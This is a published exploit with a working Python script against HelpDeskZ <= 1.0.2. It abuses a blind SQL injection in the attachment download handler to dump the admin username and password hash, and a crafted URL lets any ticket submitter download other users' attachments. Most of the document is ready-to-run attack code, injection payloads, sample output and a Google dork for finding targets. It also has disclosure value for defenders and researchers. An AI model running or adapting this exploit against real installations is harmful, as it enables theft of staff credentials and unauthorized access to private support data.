
'''
|
|
# Exploit Title: HelpDeskZ <= v1.0.2 - Authenticated SQL Injection / Unauthorized file download
|
|
# Google Dork: intext:"Help Desk Software by HelpDeskZ", inurl:?v=submit_ticket
|
|
# Date: 2017-01-30
|
|
# Exploit Author: Mariusz Popławski, kontakt@deepsec.pl ( www.afine.pl )
|
|
# Vendor Homepage: http://www.helpdeskz.com/
|
|
# Software Link: https://github.com/evolutionscript/HelpDeskZ-1.0/archive/master.zip
|
|
# Version: <= v1.0.2
|
|
# Tested on:
|
|
# CVE :
|
|
|
|
HelpDeskZ <= v1.0.2 suffers from a boolean-based blind SQL injection vulnerability in the attachment download handler that allows any authenticated ticket submitter to retrieve administrator (staff) credentials and to download attachments they are not authorized to see.
|
|
|
|
After a ticket has been submitted, the software lets its owner download an attachment through the following link:
|
|
http://127.0.0.1/helpdeskz/?/?v=view_tickets&action=ticket&param[]=2(VALID_TICKET_ID_HERE)&param[]=attachment&param[]=1&param[]=1(ATTACHMENT_ID_HERE)
|
|
|
|
FILE: view_tickets_controller.php
|
|
LINE 95: $attachment = $db->fetchRow("SELECT *, COUNT(id) AS total FROM ".TABLE_PREFIX."attachments WHERE id=".$db->real_escape_string($params[2])." AND ticket_id=".$params[0]." AND msg_id=".$params[3]);
|
|
|
|
The last `param[]` value, `$params[3]`, is appended as `AND msg_id=".$params[3]` and reaches the fetchRow query without any sanitization. Note that `$params[0]` (ticket_id) is concatenated unescaped in the same way, and the `real_escape_string()` applied to `$params[2]` offers no protection either: the value is used unquoted in a numeric comparison (`id=...`), so a payload never needs a quote character for the escaping to matter.
|
|
|
|
|
|
Steps to reproduce:
|
|
|
|
http://127.0.0.1/helpdeskz/?/?v=view_tickets&action=ticket&param[]=2(VALID_TICKET_ID_HERE)&param[]=attachment&param[]=1&param[]=1 or id>0 -- -
|
|
|
|
|
|
By supplying our own valid ticket id as the first `param[]` and appending the injected condition to the last one, the `WHERE` clause is satisfied by any attachment row (`or id>0`), so we are able to download any uploaded attachment, including those belonging to other users' tickets.
|
|
|
|
Call this script with the base URL of your HelpDeskZ installation and the login data of the ticket you submitted (EMAIL, PASSWORD).
|
|
|
|
steps:
|
|
1. go to http://192.168.100.115/helpdesk/?v=submit_ticket
|
|
2. Submit a ticket with an e-mail address you control (important: HelpDeskZ mails the ticket password to that address, and the script needs it to log in).
|
|
3. Add an attachment to the ticket (important: the injected condition is evaluated against the attachments table, so at least one attachment row must exist for the boolean oracle to ever return a hit -- with an empty table every probe looks false).
|
|
4. Get the password from email.
|
|
5. Run the script:
|
|
|
|
root@kali:~/Desktop# python test.py http://192.168.100.115/helpdesk/ localhost@localhost.com password123
|
|
|
|
where http://192.168.100.115/helpdesk/ = base url to helpdesk
|
|
localhost@localhost.com = email which we use to submit the ticket
|
|
password123 = password that system sent to our email
|
|
|
|
Output of script:
|
|
root@kali:~/Desktop# python test.py http://192.168.100.115/helpdesk localhost@localhost.com password123
|
|
2017-01-30T09:50:16.426076 GET http://192.168.100.115/helpdesk
|
|
2017-01-30T09:50:16.429116 GET http://192.168.100.115/helpdesk/
|
|
2017-01-30T09:50:16.550654 POST http://192.168.100.115/helpdesk/?v=login
|
|
2017-01-30T09:50:16.575227 GET http://192.168.100.115/helpdesk/?v=view_tickets
|
|
2017-01-30T09:50:16.674929 GET http://192.168.100.115/helpdesk?v=view_tickets&action=ticket&param[]=6&param[]=attachment&param[]=1&param[]=1%20or%201=1%20and%20ascii(substr((SeLeCt%20table_name%20from%20information_schema.columns%20where%20table_name%20like%20'%staff'%20%20limit%200,1),1,1))%20=%20%2047%20--%20-
|
|
...
|
|
------------------------------------------
|
|
username: admin
|
|
password: sha256(53874ea55571329c04b6998d9c7772c9274d3781)
(note: the script prints the "sha256" label unconditionally; the recovered digest above is 40 hex characters, the length of a SHA-1 output rather than the 64 of SHA-256, so check how HelpDeskZ actually hashes staff passwords before attempting to crack it)
|
|
|
|
'''
import re
import sys

import requests
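# Command line: python helpdesk.py <base_url> <email> <password>
# Every argument is mandatory -- sys.argv[3] is read below -- so the check
# must require four entries; the original tested `< 3` and let a call with
# only a URL and an e-mail fall through to an IndexError.
if len(sys.argv) < 4:
    print("put proper data like in example, remember to open a ticket before.... ")
    print("python helpdesk.py http://192.168.43.162/helpdesk/ myemailtologin@gmail.com password123")
    sys.exit(1)  # usage error: non-zero so wrappers can tell it from success

URL = sys.argv[1]       # base URL of the HelpDeskZ installation
EMAIL = sys.argv[2]     # e-mail address the ticket was submitted with (login name)
PASSWORD = sys.argv[3]  # password HelpDeskZ mailed for that ticket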
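def get_token(content):
    """Extract the CSRF token HelpDeskZ embeds in its login form.

    Args:
        content: HTML of a HelpDeskZ page (str, or bytes which are decoded
            as UTF-8). The form carries a hidden ``csrfhash`` input whose
            ``value`` attribute is the token.

    Returns:
        The token string, or the literal ``"error"`` when no
        ``csrfhash" value="..."`` attribute pair is present -- callers
        compare against that sentinel.
    """
    if isinstance(content, bytes):
        content = content.decode("utf-8", "replace")
    # Look for the same attribute pair the original string slicing keyed on
    # (`csrfhash" value="<token>"`), but stop at the closing quote instead of
    # guessing how the tag ends: the old code returned a mangled token
    # whenever the <input> was not closed with ` />` or `/>`.
    match = re.search(r'csrfhash"\s*value="([^"]*)"', content)
    if match is None:
        return "error"
    return match.group(1)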
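def get_ticket_id(content):
    """Pull the id of the user's own ticket out of the "view tickets" page.

    Args:
        content: HTML returned after login (str, or bytes decoded as UTF-8);
            the ticket list links to each ticket with
            ``...action=ticket&param[]=<id>``.

    Returns:
        The first ticket id found, as a string of digits, or the literal
        ``"error"`` when the page carries no ``param[]=<digits>`` -- callers
        compare against that sentinel.
    """
    if isinstance(content, bytes):
        content = content.decode("utf-8", "replace")
    # The id is numeric (it is spliced into `ticket_id=<id>` in the SQL the
    # header quotes). Taking only digits keeps a following `&...` out of the
    # value, which the old slice-up-to-the-next-quote did not guarantee, and
    # skips non-numeric param[] values instead of returning them.
    match = re.search(r'param\[\]=(\d+)', content)
    if match is None:
        return "error"
    return match.group(1)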
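# Printable ASCII codes tried, in order, for every character position of a
# value. MySQL's ascii(substr(x, n, 1)) is 0 past the end of x, so "no
# candidate matched" doubles as the end-of-string signal. The original only
# tried 47..122 ('/'..'z') and silently truncated values containing '.',
# '-', ' ' and similar.
_CHARSET = range(32, 127)

# Upper bound on characters extracted per value, so a broken oracle (a page
# that never says "couldn't find") cannot make the loop run forever.
_MAX_LEN = 128

# Seconds to wait for each HTTP response.
_TIMEOUT = 30


def _oracle(session, target, condition):
    """Return True when `condition`, injected after `target`, selects an attachment row.

    `target` is the attachment-download URL of our own ticket; its last
    `param[]=1` is the unsanitised msg_id, so the injected text lands
    verbatim in the WHERE clause. The only signal available is the
    "couldn't find" page the application returns when nothing matches.
    """
    url = target + " or 1=1 and " + condition + " -- -"
    return "couldn't find" not in session.get(url, timeout=_TIMEOUT).text


def _extract(session, target, subquery, label):
    """Recover the string result of `subquery` one character at a time.

    Args:
        session: logged-in requests session.
        target: injectable attachment URL (see `_oracle`).
        subquery: SQL yielding one string, e.g.
            ``SeLeCt username from hdz_staff limit 0,1``; used verbatim (the
            mixed-case keyword is kept from the original payload).
        label: short name shown on stderr while characters arrive.

    Returns:
        The recovered string -- empty when nothing matched at the first
        position, truncated (with a warning) if it reaches `_MAX_LEN`.
    """
    found = []
    for position in range(1, _MAX_LEN + 1):
        for code in _CHARSET:
            probe = "ascii(substr((%s),%d,1)) = %d" % (subquery, position, code)
            if _oracle(session, target, probe):
                found.append(chr(code))
                sys.stderr.write("\r%s: %s" % (label, "".join(found)))
                sys.stderr.flush()
                break
        else:
            break  # no printable byte at this position: end of the value
    else:
        print("warning: %s reached %d characters, result may be truncated" % (label, _MAX_LEN))
    sys.stderr.write("\n")
    return "".join(found)


def main():
    """Log in as the ticket submitter and dump the first staff (admin) credentials.

    Flow, unchanged from the original: fetch the front page for the CSRF
    token, POST the login form, read our own ticket id from the resulting
    page, then use that ticket's attachment-download URL as a boolean
    oracle to extract the table prefix, the staff username and the stored
    password hash character by character. Reads the module globals URL,
    EMAIL and PASSWORD; exits non-zero on any step that cannot proceed.
    """
    # Normalise the base URL so "http://host/helpdesk" and ".../helpdesk/"
    # both yield single-slash URLs; the original mixed "/?v=login" with
    # "?v=view_tickets" and produced "//" for one of the two spellings.
    base = URL.rstrip("/")

    # The original passed config={'verbose': sys.stderr}, a keyword current
    # requests releases no longer accept; progress is reported by _extract.
    session = requests.Session()

    r = session.get(base + "/", timeout=_TIMEOUT)
    token = get_token(r.text)
    if token == "error":
        print("cannot find token")
        sys.exit(1)

    login_data = {
        'do': 'login',
        'csrfhash': token,
        'email': EMAIL,
        'password': PASSWORD,
        'btn': 'Login',
    }
    r = session.post(base + "/?v=login", data=login_data, timeout=_TIMEOUT)

    ticket_id = get_ticket_id(r.text)
    if ticket_id == "error":
        print("ticketid not found, open a ticket first")
        sys.exit(1)

    # Attachment-download URL of our own ticket. The "&param[]=" separators
    # are spelled out explicitly: the published listing had "&para" collapsed
    # into the "¶" character, which the server would not parse as param[].
    target = (base + "/?v=view_tickets&action=ticket&param[]=" + ticket_id
              + "&param[]=attachment&param[]=1&param[]=1")

    # Calibrate the oracle before extracting anything: an always-false
    # condition must yield "couldn't find" and an always-true one must not.
    # A failure means either no attachment row exists yet (step 3 of the
    # header) or the base row id=1/msg_id=1 already matches, in which case
    # every probe looks "true" and the original script looped forever.
    if _oracle(session, target, "1=2"):
        print("oracle check failed: the always-false probe did not return \"couldn't find\"")
        sys.exit(1)
    if not _oracle(session, target, "1=1"):
        print("oracle check failed: no attachment row matched; submit a ticket with an attachment first")
        sys.exit(1)

    # Table prefix: the name of the table ending in "staff", minus that suffix.
    staff_table = _extract(
        session, target,
        "SeLeCt table_name from information_schema.columns where table_name like '%staff' limit 0,1",
        "staff table")
    if not staff_table.endswith("staff"):
        print("could not recover the staff table name (got %r); the oracle may be unreliable" % staff_table)
        sys.exit(1)
    table_prefix = staff_table[:-len("staff")]

    admin_username = _extract(
        session, target,
        "SeLeCt username from " + table_prefix + "staff limit 0,1",
        "username")
    admin_password = _extract(
        session, target,
        "SeLeCt password from " + table_prefix + "staff limit 0,1",
        "password")

    print("------------------------------------------")
    print("username: " + admin_username)
    # Label kept from the original. The sample digest in the header is 40 hex
    # characters -- SHA-1's length rather than SHA-256's 64 -- so confirm how
    # HelpDeskZ hashes staff passwords before trying to crack this value.
    print("password: sha256(" + admin_password + ")")
    if admin_username == "" and admin_password == '':
        print("Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_")
        print("try to submit ticket with attachment")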
if __name__ == "__main__":
    # Script entry point; the command-line arguments were already read into
    # URL / EMAIL / PASSWORD at import time.
    main()